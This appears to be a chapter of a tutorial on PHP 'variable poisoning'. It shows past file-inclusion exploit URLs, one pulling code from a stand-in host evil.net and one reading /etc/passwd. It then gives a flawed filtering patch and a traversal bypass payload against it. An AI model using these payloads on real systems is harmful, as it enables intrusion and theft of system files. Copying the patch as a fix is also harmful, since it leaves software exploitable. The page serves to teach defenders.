Variable Poisoning :: Chapter 3

Variable Poisoning :: Chapter 3

[Past Exploits]
  1. ./?page=ftp://user:pass@evil.net/arbitrary_code.php
  2. ./?page=../../../../../../../etc/passwd
New Code:
  1. // php.ini :: allow_url_fopen = Off
  2. if (!preg_match ('/\.php$/i'$_GET['page'])) {
  3.     die ('Invalid request.');
  4. }
  5. $include_file = str_replace ('../', ''$_GET['page']);
  6. $path = '/path/to/file/';
  7. if (file_exists ($path . $include_file)) {
  8.     include $path . $include_file;
  9. }
Attack:
  1. ./?page=....//....//....//....//....//....//....//etc/passwd%00.php